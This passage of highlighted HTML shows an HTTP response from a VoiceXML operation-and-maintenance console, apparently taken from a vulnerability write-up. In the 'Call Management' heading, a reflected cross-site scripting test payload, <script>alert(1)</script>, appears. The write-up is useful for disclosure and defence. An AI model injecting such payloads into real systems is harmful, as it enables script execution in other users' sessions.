data-line=\"crayon-58fe79da835f5733313357-216\">216<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835f5733313357-217\">217<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835f5733313357-218\">218<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835f5733313357-219\">219<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835f5733313357-220\">220<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835f5733313357-221\">221<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835f5733313357-222\">222<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835f5733313357-223\">223<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835f5733313357-224\">224<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835f5733313357-225\">225<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-1\"><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">OK<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-2\"><span class=\"crayon-v\">Server<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Apache<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Coyote<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-3\"><span class=\"crayon-v\">Pragma<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">No<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">cache<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-4\"><span class=\"crayon-v\">Cache<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Control<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">cache<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">store<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-5\"><span class=\"crayon-v\">Expires<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Thu<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Jan<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1970<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-6\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">charset<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">ISO<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8859<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-7\"><span class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Thu<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Sep<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2015<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">30<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-8\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10418<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-11\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">HTML<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-12\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">HEAD<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-13\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">TITLE<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">VoiceXML <\/span><span class=\"crayon-e\">Environment <\/span><span class=\"crayon-e\">Operation <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Maintenance <\/span><span class=\"crayon-e\">on <\/span><span class=\"crayon-v\">tb0ocmp0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">TITLE<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-14\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">LINK <\/span><span class=\"crayon-v\">REL<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;stylesheet&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">HREF<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;consolepages\/templates\/stylesheets\/style.css&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">TYPE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;text\/css&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-15\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">HEAD<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-17\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">BODY<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-18\"><span class=\"crayon-ta\">&lt;script <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;text\/javascript&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-20\"><span class=\"crayon-c\">\/\/HV Menu v5- by Ger Versluis (www.burmees.nl)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-21\"><span class=\"crayon-c\">\/\/Submitted to Dynamic Drive (www.dynamicdrive.com)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-22\"><span class=\"crayon-c\">\/\/Visit www.dynamicdrive.com for this script and more<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-23\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-24\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Go<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-26\"><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-27\"><span class=\"crayon-ta\">&lt;script <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;text\/javascript&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;consolepages\/templates\/js\/exmplmenu_var.jsp&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-28\"><span class=\"crayon-ta\">&lt;script <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;text\/javascript&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;consolepages\/templates\/js\/menu_com.js&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-29\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">noscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">Your <\/span><span class=\"crayon-e\">browser <\/span><span class=\"crayon-e\">does <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">support <\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">noscript<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-30\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-31\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">TABLE <\/span><span class=\"crayon-v\">WIDTH<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;800&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BORDER<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-32\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">TR<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-33\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">TD<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">IMG <\/span><span class=\"crayon-v\">SRC<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;consolepages\/templates\/images\/speechweb.gif&#8221;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">TD<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-34\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">TR<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-35\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">TR<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-36\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-37\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">TD <\/span><span class=\"crayon-v\">VALIGN<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;top&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-38\"><span class=\"crayon-e\">Logged <\/span><span class=\"crayon-e\">on <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">zerpsta1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">SPAN <\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;warn&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">SPAN<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-39\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">BR<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">BR<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">BR<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">BR<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-40\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-41\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-42\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">br<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-43\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">Call<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Management<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Active637a3<\/span><span class=\"crayon-ta\">&lt;script&gt;<\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><span class=\"crayon-e\">c7e9f <\/span><span class=\"crayon-v\">Calls<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-45\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">br<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">br<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">br<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-46\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-47\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">table <\/span><span class=\"crayon-v\">border<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">width<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1000&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-48\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">td <\/span><span class=\"crayon-v\">colspan<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;12&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;tableheader&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Calls<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;#&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">img <\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;consolepages\/templates\/images\/questionmark.gif&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">border<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">onClick<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;window.open(&#8216;help.do?prompt=p20&#8217;, &#8216;help&#8217;, &#8216;toolbar=no,width=400,height=400,resizable=no,scrollbars=yes&#8217;);&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-49\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">td <\/span><span class=\"crayon-v\">colspan<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;12&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-50\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-51\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">call<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">sort_calls<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">node<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">Server <\/span><span class=\"crayon-v\">Id<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-52\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">call<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">sort_calls<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">CallId<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-53\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">CDR<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-54\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">Call <\/span><span class=\"crayon-v\">Monitoring<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-55\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">Service <\/span><span class=\"crayon-v\">Id<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-56\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">call<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">sort_calls<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">ruri<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Remote<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">URI<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-57\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span 